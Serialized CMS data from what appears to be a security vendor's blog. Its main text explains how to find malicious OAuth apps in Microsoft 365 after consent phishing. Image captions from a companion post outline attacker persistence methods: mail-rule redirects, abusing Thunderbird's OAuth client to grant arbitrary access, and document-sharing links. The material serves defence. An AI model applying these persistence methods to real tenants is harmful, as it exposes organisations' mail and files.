Type":178,"data":333363,"content":333364},{},[333365],{"nodeType":173,"value":317560,"marks":333366,"data":333367},[],{},{"nodeType":231,"data":333369,"content":333370},{},[],{"nodeType":169,"data":333372,"content":333373},{},[333374],{"nodeType":173,"value":18605,"marks":333375,"data":333377},[333376],{"type":370},{},{"nodeType":178,"data":333379,"content":333380},{},[333381],{"nodeType":173,"value":69741,"marks":333382,"data":333383},[],{},{"nodeType":178,"data":333385,"content":333386},{},[333387,333390,333396],{"nodeType":173,"value":61741,"marks":333388,"data":333389},[],{},{"nodeType":186,"data":333391,"content":333392},{"uri":98320},[333393],{"nodeType":173,"value":1472,"marks":333394,"data":333395},[],{},{"nodeType":173,"value":1477,"marks":333397,"data":333398},[],{},[317597,317598,317599,317600,317601,317602],{"items":333401},[333402,333404],{"sys":333403,"name":505},{"id":504},{"sys":333405,"name":509},{"id":508},{"items":333407},[333408],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":333409},{"url":19129},{"items":333411},[333412],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":333413},{"url":8615},{"json":333415,"links":333786},{"nodeType":165,"data":333416,"content":333417},{},[333418,333424,333430,333436,333442,333448,333453,333459,333465,333471,333477,333482,333488,333493,333510,333516,333521,333538,333555,333570,333576,333582,333588,333594,333599,333604,333610,333616,333622,333628,333633,333639,333681,333686,333691,333707,333712,333718,333723,333729,333734,333740,333746,333751,333756,333762,333768,333774,333780],{"nodeType":178,"data":333419,"content":333420},{},[333421],{"nodeType":173,"value":289311,"marks":333422,"data":333423},[],{},{"nodeType":178,"data":333425,"content":333426},{},[333427],{"nodeType":173,"value":289318,"marks":333428,"data":333429},[],{},{"nodeType":169,"data":333431,"content":333432},{},[333433],{"nodeType":173,"value":289325,"marks":333434,"data":333435},[],{},{"nodeType":178,"data":333437,"content":333438},{},[333439],{"nodeType":173,"value":289332,"marks":333440,"data":333441},[],{},{"nodeType":178,"data":333443,"content":333444},{},[333445],{"nodeType":173,"value":289339,"marks":333446,"data":333447},[],{},{"nodeType":312,"data":333449,"content":333452},{"target":333450},{"sys":333451},{"id":289346,"type":317,"linkType":318},[],{"nodeType":178,"data":333454,"content":333455},{},[333456],{"nodeType":173,"value":289352,"marks":333457,"data":333458},[],{},{"nodeType":178,"data":333460,"content":333461},{},[333462],{"nodeType":173,"value":289359,"marks":333463,"data":333464},[],{},{"nodeType":178,"data":333466,"content":333467},{},[333468],{"nodeType":173,"value":289366,"marks":333469,"data":333470},[],{},{"nodeType":235,"data":333472,"content":333473},{},[333474],{"nodeType":173,"value":289373,"marks":333475,"data":333476},[],{},{"nodeType":312,"data":333478,"content":333481},{"target":333479},{"sys":333480},{"id":289380,"type":317,"linkType":318},[],{"nodeType":178,"data":333483,"content":333484},{},[333485],{"nodeType":173,"value":289386,"marks":333486,"data":333487},[],{},{"nodeType":312,"data":333489,"content":333492},{"target":333490},{"sys":333491},{"id":289393,"type":317,"linkType":318},[],{"nodeType":178,"data":333494,"content":333495},{},[333496,333499,333507],{"nodeType":173,"value":289399,"marks":333497,"data":333498},[],{},{"nodeType":1698,"data":333500,"content":333503},{"target":333501},{"sys":333502},{"id":289406,"type":317,"linkType":318},[333504],{"nodeType":173,"value":155323,"marks":333505,"data":333506},[],{},{"nodeType":173,"value":1477,"marks":333508,"data":333509},[],{},{"nodeType":235,"data":333511,"content":333512},{},[333513],{"nodeType":173,"value":289418,"marks":333514,"data":333515},[],{},{"nodeType":312,"data":333517,"content":333520},{"target":333518},{"sys":333519},{"id":289425,"type":317,"linkType":318},[],{"nodeType":178,"data":333522,"content":333523},{},[333524,333527,333535],{"nodeType":173,"value":289431,"marks":333525,"data":333526},[],{},{"nodeType":1698,"data":333528,"content":333531},{"target":333529},{"sys":333530},{"id":269483,"type":317,"linkType":318},[333532],{"nodeType":173,"value":155323,"marks":333533,"data":333534},[],{},{"nodeType":173,"value":197,"marks":333536,"data":333537},[],{},{"nodeType":178,"data":333539,"content":333540},{},[333541,333544,333552],{"nodeType":173,"value":289449,"marks":333542,"data":333543},[],{},{"nodeType":1698,"data":333545,"content":333548},{"target":333546},{"sys":333547},{"id":269414,"type":317,"linkType":318},[333549],{"nodeType":173,"value":8091,"marks":333550,"data":333551},[],{},{"nodeType":173,"value":289461,"marks":333553,"data":333554},[],{},{"nodeType":178,"data":333556,"content":333557},{},[333558,333561,333567],{"nodeType":173,"value":289468,"marks":333559,"data":333560},[],{},{"nodeType":186,"data":333562,"content":333563},{"uri":289473},[333564],{"nodeType":173,"value":289476,"marks":333565,"data":333566},[],{},{"nodeType":173,"value":289480,"marks":333568,"data":333569},[],{},{"nodeType":235,"data":333571,"content":333572},{},[333573],{"nodeType":173,"value":289487,"marks":333574,"data":333575},[],{},{"nodeType":178,"data":333577,"content":333578},{},[333579],{"nodeType":173,"value":289494,"marks":333580,"data":333581},[],{},{"nodeType":178,"data":333583,"content":333584},{},[333585],{"nodeType":173,"value":289501,"marks":333586,"data":333587},[],{},{"nodeType":178,"data":333589,"content":333590},{},[333591],{"nodeType":173,"value":289508,"marks":333592,"data":333593},[],{},{"nodeType":312,"data":333595,"content":333598},{"target":333596},{"sys":333597},{"id":289515,"type":317,"linkType":318},[],{"nodeType":312,"data":333600,"content":333603},{"target":333601},{"sys":333602},{"id":289521,"type":317,"linkType":318},[],{"nodeType":235,"data":333605,"content":333606},{},[333607],{"nodeType":173,"value":289527,"marks":333608,"data":333609},[],{},{"nodeType":178,"data":333611,"content":333612},{},[333613],{"nodeType":173,"value":289534,"marks":333614,"data":333615},[],{},{"nodeType":178,"data":333617,"content":333618},{},[333619],{"nodeType":173,"value":289541,"marks":333620,"data":333621},[],{},{"nodeType":178,"data":333623,"content":333624},{},[333625],{"nodeType":173,"value":289548,"marks":333626,"data":333627},[],{},{"nodeType":312,"data":333629,"content":333632},{"target":333630},{"sys":333631},{"id":289555,"type":317,"linkType":318},[],{"nodeType":178,"data":333634,"content":333635},{},[333636],{"nodeType":173,"value":289561,"marks":333637,"data":333638},[],{},{"nodeType":250,"data":333640,"content":333641},{},[333642,333655,333668],{"nodeType":254,"data":333643,"content":333644},{},[333645],{"nodeType":178,"data":333646,"content":333647},{},[333648,333652],{"nodeType":173,"value":289574,"marks":333649,"data":333651},[333650],{"type":370},{},{"nodeType":173,"value":289579,"marks":333653,"data":333654},[],{},{"nodeType":254,"data":333656,"content":333657},{},[333658],{"nodeType":178,"data":333659,"content":333660},{},[333661,333665],{"nodeType":173,"value":289589,"marks":333662,"data":333664},[333663],{"type":370},{},{"nodeType":173,"value":289594,"marks":333666,"data":333667},[],{},{"nodeType":254,"data":333669,"content":333670},{},[333671],{"nodeType":178,"data":333672,"content":333673},{},[333674,333678],{"nodeType":173,"value":289604,"marks":333675,"data":333677},[333676],{"type":370},{},{"nodeType":173,"value":289609,"marks":333679,"data":333680},[],{},{"nodeType":312,"data":333682,"content":333685},{"target":333683},{"sys":333684},{"id":289616,"type":317,"linkType":318},[],{"nodeType":312,"data":333687,"content":333690},{"target":333688},{"sys":333689},{"id":289622,"type":317,"linkType":318},[],{"nodeType":250,"data":333692,"content":333693},{},[333694],{"nodeType":254,"data":333695,"content":333696},{},[333697],{"nodeType":178,"data":333698,"content":333699},{},[333700,333704],{"nodeType":173,"value":289634,"marks":333701,"data":333703},[333702],{"type":370},{},{"nodeType":173,"value":289639,"marks":333705,"data":333706},[],{},{"nodeType":312,"data":333708,"content":333711},{"target":333709},{"sys":333710},{"id":289646,"type":317,"linkType":318},[],{"nodeType":178,"data":333713,"content":333714},{},[333715],{"nodeType":173,"value":289652,"marks":333716,"data":333717},[],{},{"nodeType":312,"data":333719,"content":333722},{"target":333720},{"sys":333721},{"id":289659,"type":317,"linkType":318},[],{"nodeType":235,"data":333724,"content":333725},{},[333726],{"nodeType":173,"value":289665,"marks":333727,"data":333728},[],{},{"nodeType":312,"data":333730,"content":333733},{"target":333731},{"sys":333732},{"id":289672,"type":317,"linkType":318},[],{"nodeType":178,"data":333735,"content":333736},{},[333737],{"nodeType":173,"value":289678,"marks":333738,"data":333739},[],{},{"nodeType":178,"data":333741,"content":333742},{},[333743],{"nodeType":173,"value":289685,"marks":333744,"data":333745},[],{},{"nodeType":312,"data":333747,"content":333750},{"target":333748},{"sys":333749},{"id":289692,"type":317,"linkType":318},[],{"nodeType":312,"data":333752,"content":333755},{"target":333753},{"sys":333754},{"id":289698,"type":317,"linkType":318},[],{"nodeType":235,"data":333757,"content":333758},{},[333759],{"nodeType":173,"value":40632,"marks":333760,"data":333761},[],{},{"nodeType":178,"data":333763,"content":333764},{},[333765],{"nodeType":173,"value":289710,"marks":333766,"data":333767},[],{},{"nodeType":178,"data":333769,"content":333770},{},[333771],{"nodeType":173,"value":289717,"marks":333772,"data":333773},[],{},{"nodeType":178,"data":333775,"content":333776},{},[333777],{"nodeType":173,"value":289724,"marks":333778,"data":333779},[],{},{"nodeType":178,"data":333781,"content":333782},{},[333783],{"nodeType":173,"value":289731,"marks":333784,"data":333785},[],{},{"entries":333787},{"inline":333788,"hyperlink":333789,"block":333796},[],[333790,333792,333794],{"sys":333791,"__typename":1528,"title":317594,"slug":317604},{"id":289406},{"sys":333793,"__typename":1528,"title":330089,"slug":330090},{"id":269483},{"sys":333795,"__typename":1528,"title":271616,"slug":271619},{"id":269414},[333797,333805,333811,333819,333825,333833,333840,333848,333856,333863,333869,333876,333882,333888],{"sys":333798,"__typename":5345,"title":333799,"caption":333800,"layoutMode":280280,"file":333801},{"id":289346},"Old way of getting persistent access","The old way: an attacker gains persistent access through the user's endpoint",{"url":333802,"width":333803,"height":333804},"https://images.ctfassets.net/y1cdw1ablpvd/60dTfWyVxckPEi4bZ6kWxn/49d8540f39641a0a1089cc313a9bc0c0/diagram6.png",2994,1534,{"sys":333806,"__typename":5345,"title":333807,"caption":333808,"layoutMode":280280,"file":333809},{"id":289380},"Abusing Mail Rules for persistence","An attacker abusing mail rules to gain persistent access",{"url":333810,"width":333803,"height":333804},"https://images.ctfassets.net/y1cdw1ablpvd/4R33B9Ru2d5LJilWS3CHWH/ff46bfc18072e03159b10571c87fef20/diagram4.png",{"sys":333812,"__typename":5345,"title":333813,"caption":333814,"layoutMode":280280,"file":333815},{"id":289393},"Mail rules settings","Example of a malicious mail rule redirect",{"url":333816,"width":333817,"height":333818},"https://images.ctfassets.net/y1cdw1ablpvd/2nA7CzgPsU4MjyGLpP9PsU/4cb3ff9bd512140dddc648324ba43db1/image6.png",930,408,{"sys":333820,"__typename":5345,"title":333821,"caption":333822,"layoutMode":280280,"file":333823},{"id":289425},"OAuth integration attacks","Attacker uses OAuth integrations to gain persistent access",{"url":333824,"width":333803,"height":333804},"https://images.ctfassets.net/y1cdw1ablpvd/3U42FTCg8KCkTWuFHgCzQn/d80952f23e2d3953683d14874422a013/diagram3.png",{"sys":333826,"__typename":5345,"title":333827,"caption":333828,"layoutMode":112585,"file":333829},{"id":289515},"Abusing SaaS integrations","Abusing a legitimate app to create custom permissions for data access",{"url":333830,"width":333831,"height":333832},"https://images.ctfassets.net/y1cdw1ablpvd/6waVV1s0GnugIX5kIEWie0/73ce4f1c6427a09f2fd9c1115abc2cab/image5.png",481,666,{"sys":333834,"__typename":5345,"title":333835,"caption":333836,"layoutMode":112585,"file":333837},{"id":289521},"Granting access to OneDrive","Using Canva to gain access to OneDrive",{"url":333838,"width":158171,"height":333839},"https://images.ctfassets.net/y1cdw1ablpvd/1s19UrmAhp4CtP2gY7Les1/63e51fb3f4b6e442e22308606fab5263/image7.png",498,{"sys":333841,"__typename":5345,"title":333842,"caption":333843,"layoutMode":112585,"file":333844},{"id":289555},"Mozilla Thunderbird source code","Thunderbird stores client IDs and secrets for different OAuth apps in the source code ",{"url":333845,"width":333846,"height":333847},"https://images.ctfassets.net/y1cdw1ablpvd/9hMtg79YP1fxq9kGCgz6v/e1bd3be4b7b057a905b288d04455f6b3/image9.png",740,447,{"sys":333849,"__typename":5345,"title":333850,"caption":333851,"layoutMode":118,"file":333852},{"id":289616},"Thunderbird permissions","Abusing Thunderbird for arbitrary permission granting",{"url":333853,"width":333854,"height":333855},"https://images.ctfassets.net/y1cdw1ablpvd/1fpNoUuQEh8GMWqBeaNyxa/9df618a9231bb056d82cad10cef3f757/image3.png",522,896,{"sys":333857,"__typename":5345,"title":333858,"caption":333859,"layoutMode":112585,"file":333860},{"id":289622},"Thunderbird access beyond email","We're able to grant access to whatever we want, not just email",{"url":333861,"width":333862,"height":207225},"https://images.ctfassets.net/y1cdw1ablpvd/4J4mjQTSDiMtQqI6J90f4t/d88cdfb54bd033324ef398cff76fe525/image__9_.png",1744,{"sys":333864,"__typename":5345,"title":333865,"caption":118,"layoutMode":112585,"file":333866},{"id":289646},"Google restricted scope",{"url":333867,"width":330112,"height":333868},"https://images.ctfassets.net/y1cdw1ablpvd/3Codlm2s4TvG1v2B6ZWQyM/39c705a48add202154bb333bdefdc899/image4.png",253,{"sys":333870,"__typename":5345,"title":333871,"caption":333872,"layoutMode":112585,"file":333873},{"id":289659},"Thunderbird email access","Using the Thunderbird app to gain access to Gmail",{"url":333874,"width":269320,"height":333875},"https://images.ctfassets.net/y1cdw1ablpvd/5yxmeq6vfcETgn4B9oWfhE/b4b3af6ce3e17a5ff06f1b49fd2b4016/image8.png",779,{"sys":333877,"__typename":5345,"title":333878,"caption":333879,"layoutMode":280280,"file":333880},{"id":289672},"Abusing document-sharing links","An attacker abusing document-sharing links to get persistent access",{"url":333881,"width":333803,"height":333804},"https://images.ctfassets.net/y1cdw1ablpvd/7rb8P0FPOwF8aixOFD8Jjq/95e47270d9a401aabd5cd1814c6d6b75/diagram5.png",{"sys":333883,"__typename":5345,"title":333884,"caption":333885,"layoutMode":112585,"file":333886},{"id":289692},"OneDrive sharing","Abusing OneDrive document-sharing functionality",{"url":333887,"width":152028,"height":290613},"https://images.ctfassets.net/y1cdw1ablpvd/TULBVq6P3BvUxvuimJjpc/111332d799763e5e26aafa9655d8b841/image10.png",{"sys":333889,"__typename":5345,"title":333890,"caption":333891,"layoutMode":112585,"file":333892},{"id":289698},"OneDrive files","OneDrive files now shows shared status",{"url":333893,"width":260476,"height":333894},"https://images.ctfassets.net/y1cdw1ablpvd/5jcr8ep5Xg7vykfNmw6mhu/6c7b4e918882a01bbc10c824670cd4d7/image1.png",474,"content:blog:maintaining-persistent-access-in-a-saas-first-world.json","blog/maintaining-persistent-access-in-a-saas-first-world.json","blog/maintaining-persistent-access-in-a-saas-first-world",{"_path":333899,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":333900,"ogImage":118,"summary":333902,"title":330089,"subtitle":118,"metaTitle":333913,"synopsis":333912,"hashTags":118,"publishedDate":333914,"slug":330090,"tagsCollection":333915,"relatedBlogPostsCollection":333921,"authorsCollection":334718,"content":334722,"_id":335464,"_type":5439,"_source":5440,"_file":335465,"_stem":335466,"_extension":5439},"/blog/is-it-safe-to-allow-my-employees-to-connect-third-party-apps-to-our-m365",{"id":269483,"publishedAt":333901},"2024-10-01T13:31:27.920Z",{"json":333903},{"data":333904,"content":333905,"nodeType":165},{},[333906],{"data":333907,"content":333908,"nodeType":178},{},[333909],{"data":333910,"marks":333911,"value":333912,"nodeType":173},{},[],"Learn about the benefits and risks of SaaS integrations and get tips for how to manage the risks.\n","Should I connect third-party apps to my M365/Google tenant?","2022-10-12T00:00:00.000Z",{"items":333916},[333917,333919],{"sys":333918,"name":26133},{"id":26132},{"sys":333920,"name":26137},{"id":26136},{"items":333922},[333923,334383],{"__typename":1528,"sys":333924,"content":333926,"title":334369,"synopsis":334370,"hashTags":118,"publishedDate":334371,"slug":334372,"tagsCollection":334373,"authorsCollection":334379},{"id":333925},"6yiDFGYTMw79qmErstqRqp",{"json":333927},{"data":333928,"content":333929,"nodeType":165},{},[333930,333962,333965,333972,333979,333984,333991,334007,334014,334021,334041,334098,334101,334108,334177,334193,334200,334207,334226,334233,334253,334260,334267,334274,334281,334288,334295,334301,334308,334315,334331,334334,334352],{"data":333931,"content":333932,"nodeType":178},{},[333933,333937,333946,333950,333958],{"data":333934,"marks":333935,"value":333936,"nodeType":173},{},[],"Despite measures by Microsoft to address the issue, ",{"data":333938,"content":333940,"nodeType":186},{"uri":333939},"https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/",[333941],{"data":333942,"marks":333943,"value":333945,"nodeType":173},{},[333944],{"type":194},"consent phishing is still on the rise",{"data":333947,"marks":333948,"value":333949,"nodeType":173},{},[],". (Not sure what consent phishing is? ",{"data":333951,"content":333952,"nodeType":186},{"uri":331178},[333953],{"data":333954,"marks":333955,"value":333957,"nodeType":173},{},[333956],{"type":194},"Read more here",{"data":333959,"marks":333960,"value":333961,"nodeType":173},{},[],"). Although prevention is best, how do you check this hasn’t already happened? ",{"data":333963,"content":333964,"nodeType":231},{},[],{"data":333966,"content":333967,"nodeType":178},{},[333968],{"data":333969,"marks":333970,"value":333971,"nodeType":173},{},[],"First, a bit of background on how OAuth apps work in Microsoft 365.",{"data":333973,"content":333974,"nodeType":178},{},[333975],{"data":333976,"marks":333977,"value":333978,"nodeType":173},{},[],"When you install an OAuth app in Microsoft 365, you see something like the familiar consent screen below, which shows the app's name and the permissions it's asking for. Once you've given your consent, behind the scenes a “service principal” is created in your tenant - this is your instance of the app. When the app does whatever the app is supposed to do (e.g. inspect your calendar, manage your to-do list etc.), it does it via this service principal.",{"data":333980,"content":333983,"nodeType":312},{"target":333981},{"sys":333982},{"id":271484,"type":317,"linkType":318},[],{"data":333985,"content":333986,"nodeType":178},{},[333987],{"data":333988,"marks":333989,"value":333990,"nodeType":173},{},[],"The app is able to authenticate to do this using a token that it is sent during the consent process. If you look closely at the URL you visit to get to the consent screen (example below), you’ll see there is a reply URL parameter - this is telling Microsoft where to send the token when a user consents:",{"data":333992,"content":333993,"nodeType":178},{},[333994,333998,334003],{"data":333995,"marks":333996,"value":333997,"nodeType":173},{},[],"https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=\u003Cclient_id>&response_type=code&",{"data":333999,"marks":334000,"value":334002,"nodeType":173},{},[334001],{"type":370},"redirect_uri=https%3A%2F%pushsecurity.com ",{"data":334004,"marks":334005,"value":334006,"nodeType":173},{},[],"&response_mode=query&scope=https%3A%2F%2Fgraph.microsoft.com%2F calendars.read%20https%3A%2F%2Fgraph.microsoft.com%2Fmail.send&state=12345",{"data":334008,"content":334009,"nodeType":178},{},[334010],{"data":334011,"marks":334012,"value":334013,"nodeType":173},{},[],"The app uses this token to authenticate as the service principal to then do whatever it’s supposed to do. In case your hacker brain is getting ahead of itself, you can’t change the reply URL to any old value to steal tokens. The app developer specifies a list of URLs that are allowed to be used here in the app’s manifest - more on that later.",{"data":334015,"content":334016,"nodeType":178},{},[334017],{"data":334018,"marks":334019,"value":334020,"nodeType":173},{},[],"Until recently, this ecosystem was a bit of a wild west. Although you can publish apps in the official app store, you don’t have to. Attackers were able to create an app on their tenant and then send consent URLs encouraging victims to grant them access, often having great success. ",{"data":334022,"content":334023,"nodeType":178},{},[334024,334028,334037],{"data":334025,"marks":334026,"value":334027,"nodeType":173},{},[],"In October 2020, ",{"data":334029,"content":334031,"nodeType":186},{"uri":334030},"https://techcommunity.microsoft.com/t5/azure-active-directory-identity/publisher-verification-and-app-consent-policies-are-now/ba-p/1257374",[334032],{"data":334033,"marks":334034,"value":334036,"nodeType":173},{},[334035],{"type":194},"Microsoft released “Publisher verification”",{"data":334038,"marks":334039,"value":334040,"nodeType":173},{},[],", allowing developers to be vetted by Microsoft and get a badge of approval on their consent screens. The following month, Microsoft changed policies so users, by default, weren't allowed to consent to apps that didn't come from a verified publisher. This makes a consent phishing attack much more difficult for attackers who are now left with the following options:",{"data":334042,"content":334043,"nodeType":250},{},[334044,334065,334088],{"data":334045,"content":334046,"nodeType":254},{},[334047],{"data":334048,"content":334049,"nodeType":178},{},[334050,334054,334062],{"data":334051,"marks":334052,"value":334053,"nodeType":173},{},[],"Find a tenant that allows users to consent to non-verified apps. The default should have been changed for all to not allow this but you can change it back (in case you’re curious, ",{"data":334055,"content":334056,"nodeType":186},{"uri":318327},[334057],{"data":334058,"marks":334059,"value":334061,"nodeType":173},{},[334060],{"type":194},"see how to check your own settings here",{"data":334063,"marks":334064,"value":53584,"nodeType":173},{},[],{"data":334066,"content":334067,"nodeType":254},{},[334068],{"data":334069,"content":334070,"nodeType":178},{},[334071,334075,334084],{"data":334072,"marks":334073,"value":334074,"nodeType":173},{},[],"Go through the publisher verification process anyway: the process is ",{"data":334076,"content":334078,"nodeType":186},{"uri":334077},"https://docs.microsoft.com/en-gb/azure/active-directory/develop/publisher-verification-overview#requirements",[334079],{"data":334080,"marks":334081,"value":334083,"nodeType":173},{},[334082],{"type":194},"detailed here",{"data":334085,"marks":334086,"value":334087,"nodeType":173},{},[],". It’s probably possible to trick but requires mocking a real company which is going to be expensive and hard to scale.",{"data":334089,"content":334090,"nodeType":254},{},[334091],{"data":334092,"content":334093,"nodeType":178},{},[334094],{"data":334095,"marks":334096,"value":334097,"nodeType":173},{},[],"Compromise an already verified publisher: definitely adds cost and complexity to an attack but would be an extremely valuable and effective approach - how much do you trust the security of all your app publishers?",{"data":334099,"content":334100,"nodeType":231},{},[],{"data":334102,"content":334103,"nodeType":178},{},[334104],{"data":334105,"marks":334106,"value":334107,"nodeType":173},{},[],"So let’s look for some malicious apps...",{"data":334109,"content":334110,"nodeType":178},{},[334111,334115,334124,334128,334137,334141,334150,334153,334162,334166,334173],{"data":334112,"marks":334113,"value":334114,"nodeType":173},{},[],"The Azure AD interface to inspect OAuth apps, or service principals, is the ",{"data":334116,"content":334118,"nodeType":186},{"uri":334117},"https://portal.azure.com/#blade/Microsoft_AAD_IAM/StartboardApplicationsMenuBlade/AllApps/menuId/",[334119],{"data":334120,"marks":334121,"value":334123,"nodeType":173},{},[334122],{"type":194},"Enterprise Applications blade",{"data":334125,"marks":334126,"value":334127,"nodeType":173},{},[]," but it’s lacking key information you need for this exercise like the reply URLs and publisher status. You might be able to see similar info if you have the licenses for ",{"data":334129,"content":334131,"nodeType":186},{"uri":334130},"https://docs.microsoft.com/en-gb/cloud-app-security/what-is-cloud-app-security",[334132],{"data":334133,"marks":334134,"value":334136,"nodeType":173},{},[334135],{"type":194},"Cloud App Security",{"data":334138,"marks":334139,"value":334140,"nodeType":173},{},[]," but they’re expensive - you can also get full information about service principals from ",{"data":334142,"content":334144,"nodeType":186},{"uri":334143},"https://docs.microsoft.com/en-us/graph/api/resources/serviceprincipal?view=graph-rest-1.0",[334145],{"data":334146,"marks":334147,"value":334149,"nodeType":173},{},[334148],{"type":194},"Graph API",{"data":334151,"marks":334152,"value":3949,"nodeType":173},{},[],{"data":334154,"content":334156,"nodeType":186},{"uri":334155},"https://docs.microsoft.com/en-us/powershell/module/az.resources/get-azadserviceprincipal?view=azps-6.3.0",[334157],{"data":334158,"marks":334159,"value":334161,"nodeType":173},{},[334160],{"type":194},"PowerShell",{"data":334163,"marks":334164,"value":334165,"nodeType":173},{},[]," (is it too early to say that ",{"data":334167,"content":334168,"nodeType":186},{"uri":271579},[334169],{"data":334170,"marks":334171,"value":334172,"nodeType":173},{},[],"Push can also solve this problem",{"data":334174,"marks":334175,"value":334176,"nodeType":173},{},[]," for you in only a few button clicks?)",{"data":334178,"content":334179,"nodeType":178},{},[334180,334184,334189],{"data":334181,"marks":334182,"value":334183,"nodeType":173},{},[],"Right off the bat, ",{"data":334185,"marks":334186,"value":334188,"nodeType":173},{},[334187],{"type":370},"we can disregard a lot of the information presented by the app",{"data":334190,"marks":334191,"value":334192,"nodeType":173},{},[],". The app’s name, home page, logo can all be anything an attacker says so if they’re trying to trick a user this will most likely look convincing and legitimate. The best you can do here is sanity check that this app makes sense in the context of your organisation or this user. ",{"data":334194,"content":334195,"nodeType":178},{},[334196],{"data":334197,"marks":334198,"value":334199,"nodeType":173},{},[],"So what is useful?",{"data":334201,"content":334202,"nodeType":235},{},[334203],{"data":334204,"marks":334205,"value":334206,"nodeType":173},{},[],"What can the app do?",{"data":334208,"content":334209,"nodeType":178},{},[334210,334214,334223],{"data":334211,"marks":334212,"value":334213,"nodeType":173},{},[],"Start by prioritising apps by the permissions they’ve been granted. Attackers will often target access to mail, files, or admin functionality so any app that requests these should be subject to more scrutiny and looked at first. As with any security exercise, you’ll know best for what’s sensitive to your organisation so apply that logic here. If you are unsure what a specific permission means, ",{"data":334215,"content":334217,"nodeType":186},{"uri":334216},"https://docs.microsoft.com/en-us/graph/permissions-reference",[334218],{"data":334219,"marks":334220,"value":334222,"nodeType":173},{},[334221],{"type":194},"here's a full reference",{"data":334224,"marks":334225,"value":197,"nodeType":173},{},[],{"data":334227,"content":334228,"nodeType":235},{},[334229],{"data":334230,"marks":334231,"value":334232,"nodeType":173},{},[],"Access to all data or just specific users?",{"data":334234,"content":334235,"nodeType":178},{},[334236,334240,334250],{"data":334237,"marks":334238,"value":334239,"nodeType":173},{},[],"It’s important to understand the difference between app permissions and delegated permissions. In short, app permissions grant tenant-wide access, delegated permissions grant access as the user. For example, if the app permission Mail.Read was granted to an app, it could read everyone’s email. If the delegated permission Mail.Read was granted to an app, it could only read the mail of the person who granted permission. ",{"data":334241,"content":334245,"nodeType":1698},{"target":334242},{"sys":334243},{"id":334244,"type":317,"linkType":318},"16568b78-3c85-451f-bb62-9d50148ca1b9",[334246],{"data":334247,"marks":334248,"value":334249,"nodeType":173},{},[],"Learn more about app vs. delegated permissions here",{"data":334251,"marks":334252,"value":1477,"nodeType":173},{},[],{"data":334254,"content":334255,"nodeType":235},{},[334256],{"data":334257,"marks":334258,"value":334259,"nodeType":173},{},[],"How many users have installed this app?",{"data":334261,"content":334262,"nodeType":178},{},[334263],{"data":334264,"marks":334265,"value":334266,"nodeType":173},{},[],"If you are the victim of consent phishing, hopefully the attacker only managed to dupe a small number of users, so common advice would be prioritise apps with a low install count. Although this makes sense, it’s often not that practical since, unless you’ve been running a tight ship, you’ll probably find a lot of apps used by one or two people.",{"data":334268,"content":334269,"nodeType":178},{},[334270],{"data":334271,"marks":334272,"value":334273,"nodeType":173},{},[],"On the flip side, app permissions can only be approved by an admin; admins can also consent to delegated permissions on behalf of all users. So apps with these permissions - effectively tenant-wide access - have also probably been approved by only a single user. Hopefully you have more faith in your admins’ ability to spot a phish but you should still treat these as having only been vetted by a single user.",{"data":334275,"content":334276,"nodeType":235},{},[334277],{"data":334278,"marks":334279,"value":334280,"nodeType":173},{},[],"Where the tokens go - the thing you can’t spoof",{"data":334282,"content":334283,"nodeType":178},{},[334284],{"data":334285,"marks":334286,"value":334287,"nodeType":173},{},[],"The only piece of information an app can’t lie about is its reply URLs. As mentioned above, these are the URLs that Microsoft is allowed to send an access token to when a user consents. If the app publisher doesn’t own these domains, they won’t ever receive their token and they can’t use the app’s access. If you can confirm all the reply URLs specified by the app are legitimately owned by the organisation the app is supposed to be from, you can be fairly confident the app is owned by them.",{"data":334289,"content":334290,"nodeType":178},{},[334291],{"data":334292,"marks":334293,"value":334294,"nodeType":173},{},[],"In the interests of keeping this short(er), a guide on domain analysis is probably out of scope. However, here’s a real-world example malicious OAuth app that was pretending to be Salesforce related, using a pretty suspicious looking URL, so you won’t always need deep analysis:",{"data":334296,"content":334300,"nodeType":312},{"target":334297},{"sys":334298},{"id":334299,"type":317,"linkType":318},"1oSdJPeXHsGlAXeX6Q2UOs",[],{"data":334302,"content":334303,"nodeType":235},{},[334304],{"data":334305,"marks":334306,"value":334307,"nodeType":173},{},[],"Is it verified? Does it matter?",{"data":334309,"content":334310,"nodeType":178},{},[334311],{"data":334312,"marks":334313,"value":334314,"nodeType":173},{},[],"You might be tempted to trust any app that is verified by Microsoft. The stamp of verification is clearly worth something but, as mentioned earlier, don’t discount the possibility of a determined attacker compromising a verified publisher to publish their own malicious app or edit an existing one. ",{"data":334316,"content":334317,"nodeType":178},{},[334318,334322,334327],{"data":334319,"marks":334320,"value":334321,"nodeType":173},{},[],"Likewise, you might also find a lot of your service principals, even ones by seemingly reputable publishers, are reported as not verified. This is because the service principal is an instance of the app at the time of install - if the publisher wasn’t verified at that point, the service principal won’t be (even if the publisher has since been verified). Since Microsoft only introduced publisher verification in 2020, all apps installed before this date will report as unverified. For reference, 78% of the service principals we’ve looked at report as having unverified publishers so this isn’t ",{"data":334323,"marks":334324,"value":334326,"nodeType":173},{},[334325],{"type":1646},"necessarily",{"data":334328,"marks":334329,"value":334330,"nodeType":173},{},[]," something to worry about. ",{"data":334332,"content":334333,"nodeType":231},{},[],{"data":334335,"content":334336,"nodeType":178},{},[334337,334341,334348],{"data":334338,"marks":334339,"value":334340,"nodeType":173},{},[],"If you find apps that look like they don't belong and you're worried they're the result of consent phishing, as well as removing the app's access (you can do this on the app's Properties page in the ",{"data":334342,"content":334344,"nodeType":186},{"uri":334343},"https://aad.portal.azure.com/#blade/Microsoft_AAD_IAM/StartboardApplicationsMenuBlade/AllApps",[334345],{"data":334346,"marks":334347,"value":334123,"nodeType":173},{},[],{"data":334349,"marks":334350,"value":334351,"nodeType":173},{},[],"), you should investigate how the app got there in the first place. A detailed walkthrough of how to fully investigate is coming soon.",{"data":334353,"content":334354,"nodeType":178},{},[334355,334359,334366],{"data":334356,"marks":334357,"value":334358,"nodeType":173},{},[],"You can gather information about the apps in your Microsoft 365 tenant with only a few clicks using the Push platform. See which apps are installed on your tenant, what kind of access they have and if we think any look suspicious. It only takes a few minutes and is totally free! ",{"data":334360,"content":334361,"nodeType":186},{"uri":271579},[334362],{"data":334363,"marks":334364,"value":334365,"nodeType":173},{},[],"Check it out.",{"data":334367,"marks":334368,"value":37,"nodeType":173},{},[],"How to find a malicious OAuth app on Microsoft 